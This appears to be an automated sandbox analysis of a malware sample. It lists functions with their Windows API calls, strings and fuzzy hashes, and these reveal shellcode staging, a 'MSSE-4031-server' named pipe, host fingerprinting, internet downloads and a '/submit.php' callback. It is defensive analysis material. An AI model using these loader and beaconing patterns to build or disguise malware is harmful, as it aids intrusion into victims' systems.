Function 006B4578 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006B473C: malloc.LIBCMT ref: 006B4758

GetUserNameA.ADVAPI32 ref: 006B45FF
GetComputerNameA.KERNEL32 ref: 006B4612
GetModuleFileNameA.KERNEL32 ref: 006B462B
strrchr.LIBCMT ref: 006B463D
GetVersionExA.KERNEL32 ref: 006B4660
_snprintf.LIBCMT ref: 006B46EB

Strings

%s%s%s, xrefs: 006B46CF

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
String ID: %s%s%s
API String ID: 1671524875-1891519693
Opcode ID: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
Instruction ID: 7656968077eabcd457339ee4435a4774d360f094d490ae88dfc272967431a447
Opcode Fuzzy Hash: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
Instruction Fuzzy Hash: E7411665B0478046EB44FB62B8147AF7793F78AFD4F544129AE460BB5ADF3DC4828B08

Function 006A1184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 006A11B8
CryptAcquireContextA.ADVAPI32 ref: 006A11DC
CryptGenRandom.ADVAPI32 ref: 006A11F0
CryptReleaseContext.ADVAPI32 ref: 006A1204

Strings

(, xrefs: 006A11D4
Microsoft Base Cryptographic Provider v1.0, xrefs: 006A11A2, 006A11C6

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$RandomRelease
String ID: ($Microsoft Base Cryptographic Provider v1.0
API String ID: 685801729-4046902070
Opcode ID: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
Instruction ID: 4c8500fda73dfb1e2e58f2760b614d25f54310626755ddc2bed896e6b92baf7c
Opcode Fuzzy Hash: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
Instruction Fuzzy Hash: BD018435B00B4592F710CF66E888799B762F7D9B88F848026C64987764CF79CA59C740

Function 00401630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
pipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeA.KERNEL32 ref: 0040167C
ConnectNamedPipe.KERNEL32 ref: 00401699
WriteFile.KERNEL32 ref: 004016BC
CloseHandle.KERNEL32 ref: 004016C9

Strings

\\.\pipe\MSSE-4031-server, xrefs: 0040164F

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateFileHandleWrite
String ID: \\.\pipe\MSSE-4031-server
API String ID: 2239253087-594494289
Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08

Function 0040DF90 Relevance: 6.2, APIs: 4, Instructions: 163
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0040E08F
GetProcAddress.KERNEL32 ref: 0040E0AD
VirtualProtect.KERNELBASE(?,?,?,-00000003), ref: 0040E0F2
VirtualProtect.KERNELBASE ref: 0040E110

Memory Dump Source

Source File: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 6e10822fc425ce4a17b75e591643631d84c9e050e16756b2b447b2e25db0e5ea
Instruction ID: 8223ee606f915a237f54ec48d54bed82f464fbc4f52c26bf22d381cc6806c48b
Opcode Fuzzy Hash: 6e10822fc425ce4a17b75e591643631d84c9e050e16756b2b447b2e25db0e5ea
Instruction Fuzzy Hash: 3C418C72B501A145DB259BB5ED803E86710A7017B8F0C4B37DBB9677C6D6BC885BC308

Function 004017F8 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 54
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 004017B9
SleepEx.KERNELBASE ref: 004017CD

Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784

GetTickCount.KERNEL32 ref: 004017FC
CreateThread.KERNEL32 ref: 00401885

Strings

., xrefs: 00401841
p, xrefs: 00401821
e, xrefs: 00401819
%c%c%c%c%c%c%c%c%cMSSE-%d-server, xrefs: 0040185A
\\.\pipe\MSSE-4031-server, xrefs: 0040184F
\, xrefs: 00401811
p, xrefs: 00401831
i, xrefs: 00401829
\, xrefs: 00401839
@@, xrefs: 004017AE

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$\\.\pipe\MSSE-4031-server$e$i$p$p
API String ID: 3660650057-3852407750
Opcode ID: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
Instruction ID: b1b191c08856ce7a5ac3e1961f061f1fb3c952ac0291ac520aaac2e6cde2bc09
Opcode Fuzzy Hash: f49c4c9a7e10605904a6a10e00f2c520319c1cb0802325312295c4206e11c210
Instruction Fuzzy Hash: BB11E1B2214A80C6F714DF62F84975BBBA0F384749F44412ADB49277A8CB7CC445CF48

Function 006ACA74 Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 268
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006B473C: malloc.LIBCMT ref: 006B4758

malloc.LIBCMT ref: 006ACB1E

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

Part of subcall function 006BCA38: malloc.LIBCMT ref: 006BCA88

Part of subcall function 006BCA38: realloc.LIBCMT ref: 006BCA97

Part of subcall function 006AEFF8: GetLocalTime.KERNEL32 ref: 006AF017

malloc.LIBCMT ref: 006ACC10
_snprintf.LIBCMT ref: 006ACC8E
_snprintf.LIBCMT ref: 006ACCB6
free.LIBCMT ref: 006ACE4B

Part of subcall function 006B5220: GetTickCount.KERNEL32 ref: 006B5232
Part of subcall function 006B5220: GetTickCount.KERNEL32 ref: 006B524A
Part of subcall function 006B5220: GetTickCount.KERNEL32 ref: 006B5768
Part of subcall function 006B5220: GetTickCount.KERNEL32 ref: 006B577E
Part of subcall function 006B5220: shutdown.WS2_32 ref: 006B579D
Part of subcall function 006B5220: shutdown.WS2_32 ref: 006B57B2
Part of subcall function 006B5220: closesocket.WS2_32 ref: 006B57BC
Part of subcall function 006B5220: free.LIBCMT ref: 006B57DC
Part of subcall function 006B5220: free.LIBCMT ref: 006B57F1

_snprintf.LIBCMT ref: 006ACCDD

Part of subcall function 006BBA2C: Sleep.KERNEL32 ref: 006BBA6F
Part of subcall function 006BBA2C: ExitThread.KERNEL32 ref: 006BBA79

Strings

/submit.php, xrefs: 006ACCC7, 006ACDA9

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTickmalloc$_snprintffree$_errnoshutdown$AllocExitHeapLocalSleepThreadTime_callnewhclosesocketrealloc
String ID: /submit.php
API String ID: 1707894466-1804779596
Opcode ID: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
Instruction ID: cf2ee89163cf4e596a2657a41e2e621918afdd13b162e5ead96f2095238a8aec
Opcode Fuzzy Hash: 10656198658d24da70f1d1fe09ccb68bf04666c12815a9cb96f16df0a35652ad
Instruction Fuzzy Hash: E891B1B17006814ADB94FBB2A4517EE3397FB86794F40402DAE4987746EF39C989CB18

Function 00401704 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 0040174D
ReadFile.KERNEL32 ref: 00401777
CloseHandle.KERNEL32 ref: 00401784

Strings

\\.\pipe\MSSE-4031-server, xrefs: 00401723

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: File$CloseCreateHandleRead
String ID: \\.\pipe\MSSE-4031-server
API String ID: 1035965006-594494289
Opcode ID: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
Instruction ID: 40b2c8f30f00ef97869f90130fa51706c158e82a26dd4cfec866ebc6162fc2d5
Opcode Fuzzy Hash: a9a6f3105b428fa11eb0a8b9509746e60382a865a5325daa86df34bad7210379
Instruction Fuzzy Hash: 2101F77531460186E7219B16F90471776A0B394BA4F648339EFA917BD4DB7DC50ACB08

Function 001B0128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 001B0328
InternetReadFile.WININET(001B0136,001B0136), ref: 001B0346

Strings

U.;, xrefs: 001B013E

Memory Dump Source

Source File: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID: U.;
API String ID: 3591508208-4213443877
Opcode ID: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction ID: 4bacff53ef5b390fb1f7fed08d1d1472820dcd11517935038517829208ec462a
Opcode Fuzzy Hash: d48c2d9fb8955299c963e91b26be717bbe84ba6b4bf8f8c02f85d3d37a0ae8aa
Instruction Fuzzy Hash: 00115E6034980D0FE61D95AE7C9A77B11CAD7DC765F25812FF40EC3295EE54CC824169

Function 006AEC4C Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AED50: WSAStartup.WS2_32 ref: 006AED6E

WSASocketA.WS2_32 ref: 006AEC7A
WSAIoctl.WS2_32 ref: 006AECC7
closesocket.WS2_32 ref: 006AED26

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: IoctlSocketStartupclosesocket
String ID:
API String ID: 365704328-0
Opcode ID: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
Instruction ID: 8b84d1c0d059002859a58854ce6e62a5b61adb44f0577b63ab41e1c874dfa98e
Opcode Fuzzy Hash: ed3bc8682e04584c078993addf9385ecf90319f8e82490e05fce3f662c482907
Instruction Fuzzy Hash: B521C13270478482D7209F24F58079AB7A6F7C97E4F544625EEAE43B89DB3EC9168F00

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 004015BC
VirtualProtect.KERNEL32 ref: 004015F6
CreateThread.KERNEL32 ref: 0040161B

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: Virtual$AllocCreateProtectThread
String ID:
API String ID: 3039780055-0
Opcode ID: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
Instruction ID: a871edb487987511a762a7aedd3aa3d9a3b96542bc8ba466cbe2f33faf2e38cc
Opcode Fuzzy Hash: 4aacca1e8eccfaf740ded84acdafb972c0e8b5e828dd24c9fd05ba3d77ec4f75
Instruction Fuzzy Hash: 3D012B9231558051E7249B73AC08B9AAA91A38DBC9F48C139EF4B5BBA5DA3CC505C708

Function 004024E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402A80: strncmp.MSVCRT ref: 00402AF5

RtlAddFunctionTable.KERNEL32 ref: 004025CF

Strings

.pdata, xrefs: 00402501

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: FunctionTablestrncmp
String ID: .pdata
API String ID: 2984418122-4177594709
Opcode ID: c6e18efcf58cff98a9045297e69aa62fcdf93a67b7625ead96cd88321bade274
Instruction ID: e5bd22c7440726ce30c9019276c637b3f75865ec35e4e6d161c99b8f67d9ebd7
Opcode Fuzzy Hash: c6e18efcf58cff98a9045297e69aa62fcdf93a67b7625ead96cd88321bade274
Instruction Fuzzy Hash: 0511E4B2B11640AAFB15AF25DF2835A7751A788B94F58843ADF08277C4FABCC841C70C

Function 001B0192 Relevance: 3.2, APIs: 2, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e910fd0decbfdb9dacc84d5d12ee22fe0b5108dfdeaefd5fe9b49e56adeff6
Instruction ID: c91b807dc841778ba24335c6de8faf2aa4e3310e28f4594ab7b7e5439e6ca625
Opcode Fuzzy Hash: 28e910fd0decbfdb9dacc84d5d12ee22fe0b5108dfdeaefd5fe9b49e56adeff6
Instruction Fuzzy Hash: 7A51C92650A6960FCB17DB3898992EB7FA1FF9A314B6880DDD0C58B543D761C84BC389

Function 001B0287 Relevance: 3.1, APIs: 2, Instructions: 92
memoryfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 001B0328
InternetReadFile.WININET(001B0136,001B0136), ref: 001B0346

Memory Dump Source

Source File: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AllocFileInternetReadVirtual
String ID:
API String ID: 3591508208-0
Opcode ID: 6e9cb7f4d98bbba5e908bea63ff70e72eac34db4f2eaabee5c46b3e942352dfa
Instruction ID: 10d1e7055f7285ffc85bccb83947350741c4cdb077dc04391a4ae4f4d1f1ee1f
Opcode Fuzzy Hash: 6e9cb7f4d98bbba5e908bea63ff70e72eac34db4f2eaabee5c46b3e942352dfa
Instruction Fuzzy Hash: AF21E12030A5461FC70ADBB898953E377D5FB4A314F6480ADE08AC3257CB24C8878788

Function 001B0109 Relevance: 1.5, APIs: 1, Instructions: 26networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(00000003,00000003,00000002,00000001), ref: 001B0124

Memory Dump Source

Source File: 00000000.00000002.4147448292.00000000001B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: 7bc2cb3a1c6ea03151e9641bb3a9e01a0a467947aec929e2c4554948d237c264
Instruction ID: 097367e345d731ed40194ab0b4cbb2395dc4a085f13921a5a90a9e1af5f4c682
Opcode Fuzzy Hash: 7bc2cb3a1c6ea03151e9641bb3a9e01a0a467947aec929e2c4554948d237c264
Instruction Fuzzy Hash: 76D09E417F85442DA55D629C991B7BB109CC35E316B21623DE187C5193AAC09A431566

Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885

SleepEx.KERNELBASE(?,?,00000001,004013B4), ref: 0040305D

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: Sleep$CountCreateThreadTickmalloc
String ID:
API String ID: 345437100-0
Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E

Function 035279EB Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 03527B38

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction ID: fa53b8ac80f5d3941c0661f07abe190515168d38eb5b01d5725264ab5dd99389
Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
Instruction Fuzzy Hash: 3B419670618B899FD784EB2CD488B2ABBE1FB98355F44096DF489C7361D734D981CB02

Non-executed Functions

Function 006C43D4 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 006C442A
_errno.LIBCMT ref: 006C4431
_invalid_parameter_noinfo.LIBCMT ref: 006C443C

Strings

U, xrefs: 006C499E

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
Instruction ID: 696bf80860c7c2a4b2db7af6d0b83ff832d4ef2bf3838478c3d4fbf5b09d4841
Opcode Fuzzy Hash: b04278913bfdb2d86bd3fcf39d809e6593f3198cef3e5a228a6e35f7ed4bf705
Instruction Fuzzy Hash: 0702247221468187DB20CF69D4A4BBEB7A2F785B94F50411AEB8983B68CF3DC546CB14

Function 006B6CB0 Relevance: 46.5, APIs: 22, Strings: 4, Instructions: 1045COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 006BBCFC
htonl.WS2_32 ref: 006BBD0B
GetLastError.KERNEL32 ref: 006BBD29

Strings

%s%d%d, xrefs: 006B7632
%s%d%d%s%s%d, xrefs: 006B76CC
x86, xrefs: 006B75B3, 006B769C
x64, xrefs: 006B759E, 006B75AC

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: htonl$ErrorLast
String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
API String ID: 3987040240-1833344708
Opcode ID: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
Instruction ID: ca6861a69b295ad18a8ebb99053b12ab19393c0f618e5cdac28066dcf11132e4
Opcode Fuzzy Hash: d68524a15420e28e89f7ae59b3e64a120402265f83246d642d5de9aedb9eafd5
Instruction Fuzzy Hash: 0A722CE1B1964082DB68EB2694517F923D3F7CAB80F944125EE0E47759EE3DCAC39B01

Function 006C0E90 Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C0EF1

Part of subcall function 006BF454: _getptd.LIBCMT ref: 006BF46A
Part of subcall function 006BF454: __updatetlocinfo.LIBCMT ref: 006BF49F
Part of subcall function 006BF454: __updatetmbcinfo.LIBCMT ref: 006BF4C6

_errno.LIBCMT ref: 006C0EF6

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_fileno.LIBCMT ref: 006C0F23

Part of subcall function 006C3914: _errno.LIBCMT ref: 006C391D
Part of subcall function 006C3914: _invalid_parameter_noinfo.LIBCMT ref: 006C3928

write_multi_char.LIBCMT ref: 006C155F
write_string.LIBCMT ref: 006C157C
write_multi_char.LIBCMT ref: 006C1599
write_string.LIBCMT ref: 006C15F8
write_string.LIBCMT ref: 006C162F
write_multi_char.LIBCMT ref: 006C1651
free.LIBCMT ref: 006C1665
_isleadbyte_l.LIBCMT ref: 006C1736
write_char.LIBCMT ref: 006C174C
write_char.LIBCMT ref: 006C176D
